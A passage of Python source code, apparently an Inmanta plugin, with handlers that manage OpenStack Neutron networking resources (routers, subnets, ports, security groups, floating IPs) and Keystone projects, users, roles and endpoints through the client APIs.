{}\n\n return networks[0]\n\n\n@provider(\"openstack::Router\", name=\"openstack\")\nclass RouterHandler(OpenStackHandler):\n def read_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n neutron_version = self.facts(ctx, resource)\n\n if len(neutron_version) > 0:\n ctx.set(\"neutron\", neutron_version)\n resource.purged = False\n\n else:\n raise ResourcePurged()\n\n # get a list of all attached subnets\n ext_name = \"\"\n external_net_id = \"\"\n if \"external_gateway_info\" in neutron_version and neutron_version[\"external_gateway_info\"] is not None:\n external_net_id = neutron_version[\"external_gateway_info\"][\"network_id\"]\n\n networks = self._neutron.list_networks(id=external_net_id)\n if len(networks[\"networks\"]) == 1:\n ext_name = networks[\"networks\"][0][\"name\"]\n\n resource.gateway = ext_name\n\n ports = self._neutron.list_ports(device_id=neutron_version[\"id\"])\n subnet_list = []\n for port in ports[\"ports\"]:\n subnets = port[\"fixed_ips\"]\n if port[\"name\"] == \"\" or port[\"name\"] not in resource.ports:\n for subnet in subnets:\n try:\n subnet_details = self._neutron.show_subnet(subnet[\"subnet_id\"])[\"subnet\"]\n # skip external networks and neutron networks such as ha networks\n if subnet_details[\"network_id\"] != external_net_id and subnet_details[\"tenant_id\"] != \"\":\n subnet_list.append(subnet_details[\"name\"])\n\n except exceptions.NeutronClientException:\n pass\n\n resource.subnets = sorted(subnet_list)\n\n routes = {}\n for route in neutron_version[\"routes\"]:\n routes[route[\"destination\"]] = route[\"nexthop\"]\n\n resource.routes = routes\n\n def create_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n project_id = self.get_project_id(resource, resource.project)\n if project_id is None:\n raise SkipResource(\"Cannot create network when project id is not yet known.\")\n\n result = self._neutron.create_router({\"router\": {\"name\": resource.name, \"tenant_id\": project_id}})\n router_id = result[\"router\"][\"id\"]\n ctx.info(\"Created router with id %(id)s\", id=router_id)\n ctx.set_created()\n\n if len(resource.subnets) > 0:\n self._update_subnets(router_id, [], resource.subnets)\n ctx.info(\"Added subnets to router with id %(id)s\", id=router_id)\n\n if resource.gateway is not None and resource.gateway != \"\":\n self._set_gateway(router_id, resource.gateway)\n ctx.info(\"Set gateway of router with id %(id)s\", id=router_id)\n\n def delete_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n router_id = ctx.get(\"neutron\")[\"id\"]\n\n ports = self._neutron.list_ports(device_id=router_id)[\"ports\"]\n for port in ports:\n if port[\"device_owner\"] == \"network:router_interface\":\n ctx.info(\"Detatch interface with port id %(port)s from router %(router_id)s\",\n port=port[\"id\"], router_id=router_id)\n self._neutron.remove_interface_router(router=router_id, body={\"port_id\": port[\"id\"]})\n\n self._neutron.delete_router(router_id)\n ctx.set_purged()\n\n def _update_subnets(self, router_id, current, desired):\n current = set(current)\n to = set(desired)\n\n # subnets to add to the router\n for subnet in (to - current):\n # query for the subnet id\n subnet_data = self._neutron.list_subnets(name=subnet)\n if \"subnets\" not in subnet_data or len(subnet_data[\"subnets\"]) != 1:\n raise Exception(\"Unable to find id of subnet %s\" % subnet)\n\n subnet_id = subnet_data[\"subnets\"][0][\"id\"]\n self._neutron.add_interface_router(router=router_id, body={\"subnet_id\": subnet_id})\n\n # subnets to delete\n for subnet in (current - to):\n # query for the subnet id\n subnet_data = self._neutron.list_subnets(name=subnet)\n if \"subnets\" not in subnet_data or len(subnet_data[\"subnets\"]) != 1:\n raise Exception(\"Unable to find id of subnet %s\" % subnet)\n\n subnet_id = subnet_data[\"subnets\"][0][\"id\"]\n self._neutron.remove_interface_router(router=router_id, body={\"subnet_id\": subnet_id})\n\n def _set_gateway(self, router_id, network):\n network = self.get_network(None, name=network)\n if network is None:\n raise Exception(\"Unable to set router gateway because the gateway network that does not exist.\")\n\n self._neutron.add_gateway_router(router_id, {'network_id': network[\"id\"]})\n\n def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: resources.PurgeableResource) -> None:\n router_id = ctx.get(\"neutron\")[\"id\"]\n if \"name\" in changes:\n self._neutron.update_router(router_id, {\"router\": {\"name\": resource.name}})\n ctx.set_updated()\n\n if \"subnets\" in changes:\n self._update_subnets(router_id, changes[\"subnets\"][\"current\"], changes[\"subnets\"][\"desired\"])\n ctx.info(\"Modified subnets of router with id %(id)s\", id=router_id)\n ctx.set_updated()\n\n if \"gateway\" in changes:\n self._set_gateway(router_id, resource.gateway)\n ctx.info(\"Modified gateway of router with id %(id)s\", id=router_id)\n ctx.set_updated()\n\n if \"routes\" in changes:\n ctx.set_updated()\n self._neutron.update_router(router_id, {\"router\": {\"routes\": [{\"nexthop\": n, \"destination\": d}\n for d, n in resource.routes.items()]}})\n\n def facts(self, ctx, resource: Router) -> dict:\n routers = self._neutron.list_routers(name=resource.name)\n\n if \"routers\" not in routers:\n return {}\n\n filtered_list = [rt for rt in routers[\"routers\"] if rt[\"name\"] == resource.name]\n\n if len(filtered_list) == 0:\n return {}\n\n if len(filtered_list) > 1:\n LOGGER.warning(\"Multiple routers with the same name available!\")\n return {}\n\n router = filtered_list[0]\n return router\n\n\n@provider(\"openstack::Subnet\", name=\"openstack\")\nclass SubnetHandler(OpenStackHandler):\n def read_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n neutron_version = self.facts(ctx, resource)\n\n if len(neutron_version) > 0:\n resource.purged = False\n resource.id = neutron_version[\"id\"]\n resource.network_address = neutron_version[\"cidr\"]\n resource.dhcp = neutron_version[\"enable_dhcp\"]\n resource.network_id = neutron_version[\"network_id\"]\n resource.dns_servers = neutron_version[\"dns_nameservers\"]\n\n pool = neutron_version[\"allocation_pools\"][0]\n if resource.allocation_start != \"\" and resource.allocation_end != \"\": # only change when they are both set\n resource.allocation_start = pool[\"start\"]\n resource.allocation_end = pool[\"end\"]\n\n ctx.set(\"neutron\", neutron_version)\n else:\n raise ResourcePurged()\n\n def create_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n project_id = self.get_project_id(resource, resource.project)\n if project_id is None:\n raise SkipResource(\"Cannot create network when project id is not yet known.\")\n\n network = self.get_network(project_id, name=resource.network)\n if network is None:\n raise Exception(\"Unable to create subnet because of network that does not exist.\")\n\n body = {\"name\": resource.name, \"network_id\": network[\"id\"], \"enable_dhcp\": resource.dhcp,\n \"cidr\": resource.network_address, \"ip_version\": 4, \"tenant_id\": project_id}\n\n if len(resource.allocation_start) > 0 and len(resource.allocation_end) > 0:\n body[\"allocation_pools\"] = [{\"start\": resource.allocation_start, \"end\": resource.allocation_end}]\n\n if len(resource.dns_servers) > 0:\n body[\"dns_nameservers\"] = resource.dns_servers\n\n self._neutron.create_subnet({\"subnet\": body})\n ctx.set_created()\n\n def delete_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n neutron = ctx.get(\"neutron\")\n self._neutron.delete_subnet(neutron[\"id\"])\n ctx.set_purged()\n\n def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: resources.PurgeableResource) -> None:\n neutron = ctx.get(\"neutron\")\n\n # Send everything that can be updated to the server, the API will figure out what to change\n body = {\"subnet\": {\"enable_dhcp\": resource.dhcp}}\n if len(resource.allocation_start) > 0 and len(resource.allocation_end) > 0:\n body[\"allocation_pools\"] = [{\"start\": resource.allocation_start,\n \"end\": resource.allocation_end}]\n\n if len(resource.dns_servers) > 0:\n body[\"dns_nameservers\"] = resource.dns_servers\n\n self._neutron.update_subnet(neutron[\"id\"], body)\n ctx.set_updated()\n\n @cache(timeout=5)\n def facts(self, ctx, resource):\n subnets = self._neutron.list_subnets(name=resource.name)\n\n if \"subnets\" not in subnets:\n return {}\n\n filtered_list = [sn for sn in subnets[\"subnets\"] if sn[\"name\"] == resource.name]\n\n if len(filtered_list) == 0:\n return {}\n\n if len(filtered_list) > 1:\n LOGGER.warning(\"Multiple subnets with the same name available!\")\n return {}\n\n subnet = filtered_list[0]\n return subnet\n\n\n@provider(\"openstack::RouterPort\", name=\"openstack\")\nclass RouterPortHandler(OpenStackHandler):\n def read_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n project_id = self.get_project_id(resource, resource.project)\n if project_id is None:\n raise SkipResource(\"Cannot create network when project id is not yet known.\")\n\n neutron_version = self.facts(ctx, resource)\n ctx.set(\"neutron\", neutron_version)\n ctx.set(\"project_id\", project_id)\n\n router = None\n if len(neutron_version) > 0:\n # Router stuff\n if neutron_version[\"device_id\"] == \"\":\n resource.router = \"\"\n else:\n router = self.get_router(router_id=neutron_version[\"device_id\"])\n resource.router = router[\"name\"]\n\n # Network stuff\n network = self.get_network(project_id, network_id=neutron_version[\"network_id\"])\n resource.network = network[\"name\"]\n ctx.set(\"network\", network)\n\n # IP address / subnet stuff\n subnet = None\n if len(neutron_version[\"fixed_ips\"]) > 1:\n raise Exception(\"This handler only supports ports that have an address in a single subnet.\")\n elif len(neutron_version[\"fixed_ips\"]) == 0:\n resource.subnet = \"\"\n resource.address = \"\"\n else:\n subnet = self.get_subnet(project_id, subnet_id=neutron_version[\"fixed_ips\"][0][\"subnet_id\"])\n resource.subnet = subnet[\"name\"]\n resource.address = neutron_version[\"fixed_ips\"][0][\"ip_address\"]\n\n ctx.set(\"subnet\", subnet)\n\n resource.purged = False\n else:\n raise ResourcePurged()\n\n def create_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n project_id = ctx.get(\"project_id\")\n\n network = self.get_network(project_id, name=resource.network)\n if network is None:\n raise SkipResource(\"Unable to create router port because the network does not exist.\")\n\n subnet = self.get_subnet(project_id, name=resource.subnet)\n if subnet is None:\n raise SkipResource(\"Unable to create router port because the subnet does not exist.\")\n\n router = self.get_router(project_id, name=resource.router)\n if router is None:\n raise SkipResource(\"Unable to create router port because the router does not exist.\")\n\n body_value = {'port': {'admin_state_up': True, 'name': resource.name, 'network_id': network[\"id\"]}}\n if resource.address != \"\":\n body_value[\"port\"][\"fixed_ips\"] = [{\"subnet_id\": subnet[\"id\"], \"ip_address\": resource.address}]\n\n result = self._neutron.create_port(body=body_value)\n\n if \"port\" not in result:\n raise Exception(\"Unable to create port.\")\n\n port_id = result[\"port\"][\"id\"]\n\n # attach it to the router\n self._neutron.add_interface_router(router[\"id\"], body={\"port_id\": port_id})\n ctx.set_created()\n\n def delete_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n port = ctx.get(\"neutron\")\n\n if port[\"device_owner\"] == \"network:router_interface\":\n ctx.info(\"Detatch interface with port id %(port)s from router %(router_id)s\",\n port=port[\"id\"], router_id=port[\"device_id\"])\n self._neutron.remove_interface_router(router=port[\"device_id\"], body={\"port_id\": port[\"id\"]})\n else:\n self._neutron.delete_port(port[\"id\"])\n\n ctx.set_purged()\n\n def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: resources.PurgeableResource) -> None:\n raise SkipResource(\"Making changes to router ports is not supported.\")\n\n def facts(self, ctx, resource: RouterPort):\n ports = self._neutron.list_ports(name=resource.name)\n\n if \"ports\" not in ports:\n return {}\n\n filtered_list = [port for port in ports[\"ports\"] if port[\"name\"] == resource.name]\n\n if len(filtered_list) == 0:\n return {}\n\n if len(filtered_list) > 1:\n LOGGER.warning(\"Multiple ports with the same name available!\")\n return {}\n\n port = filtered_list[0]\n return port\n\n\n@provider(\"openstack::HostPort\", name=\"openstack\")\nclass HostPortHandler(OpenStackHandler):\n def get_port(self, ctx, network_id, device_id):\n ports = self._neutron.list_ports(network_id=network_id, device_id=device_id)[\"ports\"]\n ctx.debug(\"Retrieved ports matching network %(network_id)s and device %(device_id)s\",\n network_id=network_id, device_id=device_id, ports=ports)\n if len(ports) > 0:\n return ports[0]\n return None\n\n def wait_for_active(self, ctx, project_id, resource):\n \"\"\"\n A port cannot be attached to a VM when the VM is in the building state. This method waits a limited amount of\n time for the VM to become active. If it takes to long, this resource will be skipped.\n \"\"\"\n tries = 0\n max_attempts = resource.retries if resource.retries > 0 else 1\n while tries < max_attempts:\n vm = self.get_host(project_id, resource.host)\n vm_state = getattr(vm, \"OS-EXT-STS:vm_state\")\n if vm_state == \"active\":\n return vm\n\n ctx.info(\"VM for port is not in active state. Waiting and retrying in 5 seconds.\")\n tries += 1\n time.sleep(resource.wait)\n\n raise SkipResource(\"Unable to create host port because vm is not in active state (current %s)\" % vm_state)\n\n def read_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n if resource.purged:\n # Most stuff below here will err eventually\n return\n\n project_id = self.get_project_id(resource, resource.project)\n if project_id is None:\n raise SkipResource(\"Cannot create a host port when project id is not yet known.\")\n ctx.set(\"project_id\", project_id)\n\n network = self.get_network(project_id, resource.network)\n if network is None:\n raise SkipResource(\"Network %s for port %s not found.\" % (resource.network, resource.name))\n ctx.set(\"network\", network)\n\n vm = self.wait_for_active(ctx, project_id, resource)\n if vm is None:\n raise SkipResource(\"Unable to create host port because the vm does not exist.\")\n\n ctx.set(\"vm\", vm)\n\n port = self.get_port(ctx, network[\"id\"], vm.id)\n ctx.set(\"port\", port)\n if port is None:\n raise ResourcePurged()\n\n resource.purged = False\n if not resource.dhcp:\n resource.address = port[\"fixed_ips\"][0][\"ip_address\"]\n\n if len(port[\"fixed_ips\"]) > 0:\n subnet = self.get_subnet(project_id, subnet_id=port[\"fixed_ips\"][0][\"subnet_id\"])\n resource.subnet = subnet[\"name\"]\n else:\n resource.subnet = \"\"\n\n if \"port_security_enabled\" in port:\n resource.portsecurity = port[\"port_security_enabled\"]\n ctx.set(\"portsecurity\", True)\n else:\n ctx.set(\"portsecurity\", False)\n resource.portsecurity = True\n if not resource.portsecurity:\n # Port security is not enabled in the API, but resource wants to disable it.\n ctx.warning(\"Ignoring portsecurity is False because extension is not enabled.\")\n\n resource.name = port[\"name\"]\n\n def create_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n project_id = ctx.get(\"project_id\")\n network = ctx.get(\"network\")\n vm = ctx.get(\"vm\")\n subnet = self.get_subnet(project_id, name=resource.subnet)\n if subnet is None:\n raise SkipResource(\"Unable to create host port because the subnet does not exist.\")\n\n try:\n body_value = {'port': {'admin_state_up': True, 'name': resource.name, 'network_id': network[\"id\"]}}\n\n if resource.address != \"\" and not resource.dhcp:\n body_value[\"port\"][\"fixed_ips\"] = [{\"subnet_id\": subnet[\"id\"], \"ip_address\": resource.address}]\n\n if (not ctx.contains(\"portsecurity\") or ctx.get(\"portsecurity\")) and not resource.portsecurity:\n body_value[\"port\"][\"port_security_enabled\"] = False\n body_value[\"port\"][\"security_groups\"] = None\n\n result = self._neutron.create_port(body=body_value)\n\n if \"port\" not in result:\n raise Exception(\"Unable to create port.\")\n\n port_id = result[\"port\"][\"id\"]\n\n # attach it to the host\n vm.interface_attach(port_id, None, None)\n except novaclient.exceptions.Conflict as e:\n raise SkipResource(\"Host is not ready: %s\" % str(e), e)\n\n ctx.set_created()\n\n def delete_resource(self, ctx: handler.HandlerContext, resource: resources.PurgeableResource) -> None:\n port = ctx.get(\"port\")\n response = self._neutron.delete_port(port[\"id\"])\n ctx.info(\"Deleted port %(port_id)s with response %(response)s\", port_id=port[\"id\"], response=response)\n ctx.set_purged()\n\n def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: resources.PurgeableResource) -> None:\n port = ctx.get(\"port\")\n\n try:\n if ctx.get(\"portsecurity\") and \"portsecurity\" in changes:\n if not changes[\"portsecurity\"][\"desired\"]:\n self._neutron.update_port(port=port[\"id\"], body={\"port\": {\"port_security_enabled\": False,\n \"security_groups\": None}})\n else:\n raise SkipResource(\"Turning port security on again is not supported.\")\n\n del changes[\"portsecurity\"]\n\n if \"name\" in changes:\n self._neutron.update_port(port=port[\"id\"], body={\"port\": {\"name\": resource.name}})\n del changes[\"name\"]\n\n if len(changes) > 0:\n raise SkipResource(\"not implemented, %s\" % changes)\n\n except novaclient.exceptions.Conflict as e:\n raise SkipResource(\"Host is not ready: %s\" % str(e))\n\n @cache(timeout=5)\n def facts(self, ctx, resource):\n ports = self._neutron.list_ports(name=resource.name)\n\n if \"ports\" not in ports:\n return {}\n\n filtered_list = [port for port in ports[\"ports\"] if port[\"name\"] == resource.name]\n\n if len(filtered_list) == 0:\n return {}\n\n if len(filtered_list) > 1:\n LOGGER.warning(\"Multiple ports with the same name available!\")\n return {}\n\n port = filtered_list[0]\n facts = {}\n index = 0\n for ip in port[\"fixed_ips\"]:\n facts[\"ip_address_%d\" % index] = ip[\"ip_address\"]\n if index == 0:\n facts[\"ip_address\"] = ip[\"ip_address\"]\n\n return facts\n\n\n@provider(\"openstack::SecurityGroup\", name=\"openstack\")\nclass SecurityGroupHandler(OpenStackHandler):\n def _build_current_rules(self, ctx, security_group):\n rules = []\n for rule in security_group[\"security_group_rules\"]:\n if rule[\"ethertype\"] != \"IPv4\":\n continue\n\n current_rule = {\"__id\": rule[\"id\"]}\n if rule[\"protocol\"] is None:\n current_rule[\"protocol\"] = \"all\"\n else:\n current_rule[\"protocol\"] = rule[\"protocol\"]\n\n if rule[\"remote_ip_prefix\"] is not None:\n current_rule[\"remote_ip_prefix\"] = rule[\"remote_ip_prefix\"]\n\n elif rule[\"remote_group_id\"] is not None:\n rgi = self.get_security_group(ctx, group_id=rule[\"remote_group_id\"])\n current_rule[\"remote_group\"] = rgi[\"name\"]\n\n else:\n current_rule[\"remote_ip_prefix\"] = \"0.0.0.0/0\"\n\n current_rule[\"direction\"] = rule[\"direction\"]\n current_rule[\"port_range_min\"] = rule[\"port_range_min\"]\n current_rule[\"port_range_max\"] = rule[\"port_range_max\"]\n\n rules.append(current_rule)\n\n return rules\n\n def read_resource(self, ctx: handler.HandlerContext, resource: SecurityGroup) -> None:\n sg = self.get_security_group(ctx, name=resource.name)\n\n ctx.set(\"sg\", sg)\n if sg is None:\n raise ResourcePurged()\n\n resource.purged = False\n resource.description = sg[\"description\"]\n resource.rules = self._build_current_rules(ctx, sg)\n\n def _compare_rule(self, old, new):\n old_keys = set([x for x in old.keys() if not x.startswith(\"__\")])\n new_keys = set([x for x in new.keys() if not x.startswith(\"__\")])\n\n if old_keys != new_keys:\n return False\n\n for key in old_keys:\n if old[key] != new[key]:\n return False\n\n return True\n\n def _diff(self, current, desired):\n changes = OpenStackHandler._diff(self, current, desired)\n\n if \"rules\" in changes:\n old_rules = list(changes[\"rules\"][\"current\"])\n new_rules = list(changes[\"rules\"][\"desired\"])\n\n for new_rule in changes[\"rules\"][\"desired\"]:\n for old_rule in changes[\"rules\"][\"current\"]:\n if self._compare_rule(old_rule, new_rule):\n old_rules.remove(old_rule)\n new_rules.remove(new_rule)\n break\n\n if len(old_rules) == 0 and len(new_rules) == 0:\n del changes[\"rules\"]\n\n return changes\n\n def _update_rules(self, group_id, resource, current_rules, desired_rules):\n # # Update rules. First add all new rules, than remove unused rules\n old_rules = list(current_rules)\n # new_rules = [dict(x) for x in desired_rules]\n new_rules = list(desired_rules)\n\n for new_rule in desired_rules:\n for old_rule in current_rules:\n if self._compare_rule(old_rule, new_rule):\n old_rules.remove(old_rule)\n new_rules.remove(new_rule)\n break\n\n for new_rule in new_rules:\n new_rule[\"ethertype\"] = \"IPv4\"\n if \"remote_group\" in new_rule:\n if new_rule[\"remote_group\"] is not None:\n # lookup the id of the group\n groups = self._neutron.list_security_groups(name=new_rule[\"remote_group\"])[\"security_groups\"]\n if len(groups) == 0:\n # TODO: log skip rule\n continue # Do not update this rule\n\n del new_rule[\"remote_group\"]\n new_rule[\"remote_group_id\"] = groups[0][\"id\"]\n\n else:\n del new_rule[\"remote_group_id\"]\n\n new_rule[\"security_group_id\"] = group_id\n\n if new_rule[\"protocol\"] == \"all\":\n new_rule[\"protocol\"] = None\n\n try:\n self._neutron.create_security_group_rule({'security_group_rule': new_rule})\n except exceptions.Conflict:\n LOGGER.exception(\"Rule conflict for rule %s\", new_rule)\n raise\n\n for old_rule in old_rules:\n try:\n self._neutron.delete_security_group_rule(old_rule[\"__id\"])\n except exceptions.NotFound:\n # TODO: handle this\n pass\n\n def create_resource(self, ctx: handler.HandlerContext, resource: SecurityGroup) -> None:\n sg = self._neutron.create_security_group({\"security_group\": {\"name\": resource.name,\n \"description\": resource.description}})\n current_rules = self._build_current_rules(ctx, sg[\"security_group\"])\n self._update_rules(sg[\"security_group\"][\"id\"], resource, current_rules, resource.rules)\n ctx.set_created()\n\n def delete_resource(self, ctx: handler.HandlerContext, resource: SecurityGroup) -> None:\n sg = ctx.get(\"sg\")\n tries = 0\n max_attempts = resource.retries if resource.retries > 0 else 1\n while tries < max_attempts:\n try:\n self._neutron.delete_security_group(sg[\"id\"])\n ctx.set_purged()\n return\n except Exception:\n ctx.info(\"Delete failed. Waiting and trying again in 5 seconds.\")\n time.sleep(resource.wait)\n tries += 1\n\n raise SkipResource(\"Deleting the security group failed, probably because it is still in use.\")\n\n\n def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: SecurityGroup) -> None:\n sg = ctx.get(\"sg\")\n if \"name\" in changes or \"description\" in changes:\n self._neutron.update_security_group(sg[\"id\"], {\"security_group\": {\"name\": resource.name,\n \"description\": resource.description}})\n ctx.set_updated()\n\n if \"rules\" in changes:\n self._update_rules(sg[\"id\"], resource, changes[\"rules\"][\"current\"], changes[\"rules\"][\"desired\"])\n ctx.set_updated()\n\n @cache(timeout=5)\n def facts(self, ctx, resource):\n return {}\n\n\n@provider(\"openstack::FloatingIP\", name=\"openstack\")\nclass FloatingIPHandler(OpenStackHandler):\n @cache(timeout=10)\n def get_port_id(self, name):\n ports = self._neutron.list_ports(name=name)[\"ports\"]\n if len(ports) == 0:\n return None\n\n elif len(ports) == 1:\n return ports[0][\"id\"]\n else:\n raise Exception(\"Multiple ports found with name %s\" % name)\n\n @cache(timeout=10)\n def get_floating_ip(self, port_id):\n fip = self._neutron.list_floatingips(port_id=port_id)[\"floatingips\"]\n if len(fip) == 0:\n return None\n\n else:\n return fip[0][\"id\"]\n\n def read_resource(self, ctx: handler.HandlerContext, resource: FloatingIP) -> None:\n port_id = self.get_port_id(resource.port)\n ctx.set(\"port_id\", port_id)\n fip = self.get_floating_ip(port_id)\n ctx.set(\"fip\", fip)\n\n if fip is None:\n raise ResourcePurged()\n\n resource.purged = False\n\n def _find_available_fips(self, project_id, network_id):\n available_fips = []\n floating_ips = self._neutron.list_floatingips(floating_network_id=network_id, tenant_id=project_id)[\"floatingips\"]\n for fip in floating_ips:\n if fip[\"port_id\"] is None:\n available_fips.append(fip)\n\n return available_fips\n\n def create_resource(self, ctx: handler.HandlerContext, resource: FloatingIP) -> None:\n network_id = self.get_network(None, resource.external_network)[\"id\"]\n project_id = self.get_project_id(resource, resource.project)\n if project_id is None:\n raise SkipResource(\"Cannot create a floating ip when project id is not yet known.\")\n ctx.set(\"project_id\", project_id)\n\n port_id = ctx.get(\"port_id\")\n if network_id is None:\n raise SkipResource(\"Unable to finx external network\")\n\n available_fips = self._find_available_fips(project_id, network_id)\n if len(available_fips) > 0:\n fip_id = available_fips[0][\"id\"]\n self._neutron.update_floatingip(fip_id, {\"floatingip\": {\"port_id\": port_id, \"description\": resource.name}})\n\n else:\n self._neutron.create_floatingip({\"floatingip\": {\"port_id\": port_id, \"floating_network_id\": network_id,\n \"description\": resource.name}})\n\n ctx.set_created()\n\n def delete_resource(self, ctx: handler.HandlerContext, resource: FloatingIP) -> None:\n self._neutron.delete_floatingip(ctx.get(\"fip\"))\n ctx.set_purged()\n\n def update_resource(self, ctx: handler.HandlerContext, changes: dict, resource: FloatingIP) -> None:\n raise SkipResource(\"Updating a floating ip is not supported\")\n\n @cache(timeout=5)\n def facts(self, ctx, resource):\n port_id = self.get_port_id(resource.port)\n fip = self._neutron.list_floatingips(port_id=port_id)[\"floatingips\"]\n if len(fip) == 0:\n return {}\n\n else:\n return {\"ip_address\": fip[0][\"floating_ip_address\"]}\n\n\n@dependency_manager\ndef keystone_dependencies(config_model, resource_model):\n projects = {}\n users = {}\n roles = []\n for _, res in resource_model.items():\n if res.id.entity_type == \"openstack::Project\":\n projects[res.name] = res\n\n elif res.id.entity_type == \"openstack::User\":\n users[res.name] = res\n\n elif res.id.entity_type == \"openstack::Role\":\n roles.append(res)\n\n for role in roles:\n if role.project not in projects:\n raise Exception(\"The project %s of role %s is not defined in the model.\" % (role.project, role.role_id))\n\n if role.user not in users:\n raise Exception(\"The user %s of role %s is not defined in the model.\" % (role.user, role.role_id))\n\n role.requires.add(projects[role.project])\n role.requires.add(users[role.user])\n\n\n@provider(\"openstack::Project\", name=\"openstack\")\nclass ProjectHandler(OpenStackHandler):\n def read_resource(self, ctx, resource):\n try:\n project = self._keystone.projects.find(name=resource.name)\n resource.purged = False\n resource.enabled = project.enabled\n resource.description = project.description\n ctx.set(\"project\", project)\n except NotFound:\n raise ResourcePurged()\n\n def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n self._keystone.projects.create(resource.name, description=resource.description, enabled=resource.enabled,\n domain=\"default\")\n ctx.set_created()\n\n def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n ctx.get(\"project\").delete()\n ctx.set_purged()\n\n def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n ctx.get(\"project\").update(name=resource.name, description=resource.description, enabled=resource.enabled)\n ctx.set_updated()\n\n def facts(self, ctx, resource: Project):\n keystone = self.get_connection(resource)\n try:\n project = keystone.tenants.find(name=resource.name)\n return {\"id\": project.id, \"name\": project.name}\n except Exception:\n return {}\n\n\n@provider(\"openstack::User\", name=\"openstack\")\nclass UserHandler(OpenStackHandler):\n def read_resource(self, ctx, resource):\n try:\n user = self._keystone.users.find(name=resource.name)\n resource.purged = False\n resource.enabled = user.enabled\n resource.email = user.email\n ctx.set(\"user\", user)\n\n # if a password is provided (not \"\"), check if it works otherwise mark it as \"***\"\n if resource.password != \"\":\n try:\n s = keystone_client.Client(auth_url=resource.auth_url, username=resource.name, password=resource.password)\n s.authenticate()\n except Exception:\n resource.password = \"***\"\n\n except NotFound:\n raise ResourcePurged()\n\n def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n self._keystone.users.create(resource.name, password=resource.password, email=resource.email, enabled=resource.enabled)\n ctx.set_created()\n\n def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n ctx.get(\"user\").delete()\n ctx.set_purged()\n\n def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n user_id = ctx.get(\"user\").id\n if resource.password != \"\":\n self._keystone.users.update(user_id, password=resource.password, email=resource.email, enabled=resource.enabled)\n else:\n self._keystone.users.update(user_id, email=resource.email, enabled=resource.enabled)\n ctx.set_updated()\n\n\n@provider(\"openstack::Role\", name=\"openstack\")\nclass RoleHandler(OpenStackHandler):\n \"\"\"\n creates roles and user, project, role assocations\n \"\"\"\n def read_resource(self, ctx, resource):\n # get the role\n role = None\n try:\n role = self._keystone.roles.find(name=resource.role)\n except NotFound:\n ctx.info(\"Role %(role)s does not exit yet.\", role=resource.role)\n pass\n\n try:\n user = self._keystone.users.find(name=resource.user)\n except NotFound:\n raise SkipResource(\"The user does not exist.\")\n\n try:\n project = self._keystone.projects.find(name=resource.project)\n except NotFound:\n raise SkipResource(\"The project does not exist.\")\n\n try:\n self._keystone.roles.check(role=role, user=user, project=project)\n resource.purged = False\n except Exception:\n resource.purged = True\n\n ctx.set(\"role\", role)\n ctx.set(\"user\", user)\n ctx.set(\"project\", project)\n\n def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n user = ctx.get(\"user\")\n project = ctx.get(\"project\")\n role = ctx.get(\"role\")\n\n if role is None:\n role = self._keystone.roles.create(resource.role)\n\n self._keystone.roles.grant(user=user, role=role, project=project)\n ctx.set_created()\n\n def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n user = ctx.get(\"user\")\n project = ctx.get(\"project\")\n role = ctx.get(\"role\")\n\n self._keystone.roles.revoke(user=user, role=role, project=project)\n ctx.set_purged()\n\n def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n assert False, \"This should not happen\"\n\n\n@provider(\"openstack::Service\", name=\"openstack\")\nclass ServiceHandler(OpenStackHandler):\n def read_resource(self, ctx, resource):\n service = None\n try:\n service = self._keystone.services.find(name=resource.name, type=resource.type)\n resource.description = service.description\n resource.purged = False\n except NotFound:\n resource.purged = True\n resource.description = None\n resource.name = None\n resource.type = None\n\n ctx.set(\"service\", service)\n\n def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n self._keystone.services.create(resource.name, resource.type, description=resource.description)\n ctx.set_created()\n\n def delete_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n ctx.get(\"service\").delete()\n ctx.set_purged()\n\n def update_resource(self, ctx, changes: dict, resource: resources.PurgeableResource) -> None:\n self._keystone.services.update(ctx.get(\"service\"), description=resource.description)\n ctx.set_updated()\n\n\n@provider(\"openstack::EndPoint\", name=\"openstack\")\nclass EndpointHandler(OpenStackHandler):\n\n types = {\"admin\": \"admin_url\", \"internal\": \"internal_url\", \"public\": \"public_url\"}\n\n def read_resource(self, ctx, resource):\n service = None\n for s in self._keystone.services.list():\n if resource.service_id == \"%s_%s\" % (s.type, s.name):\n service = s\n\n if service is None:\n raise SkipResource(\"Unable to find service to which endpoint belongs\")\n\n endpoints = {}\n try:\n endpoints = {e.interface: e for e in self._keystone.endpoints.list(region=resource.region, service=service)}\n for k, v in EndpointHandler.types.items():\n setattr(resource, v, endpoints[k].url if k in endpoints else None)\n\n resource.purged = False\n except NotFound:\n resource.purged = True\n resource.region = None\n resource.internal_url = None\n resource.admin_url = None\n resource.public_url = None\n\n ctx.set(\"service\", service)\n ctx.set(\"endpoints\", endpoints)\n\n def create_resource(self, ctx, resource: resources.PurgeableResource) -> None:\n assert False, \"Should never get here\"\n\n def 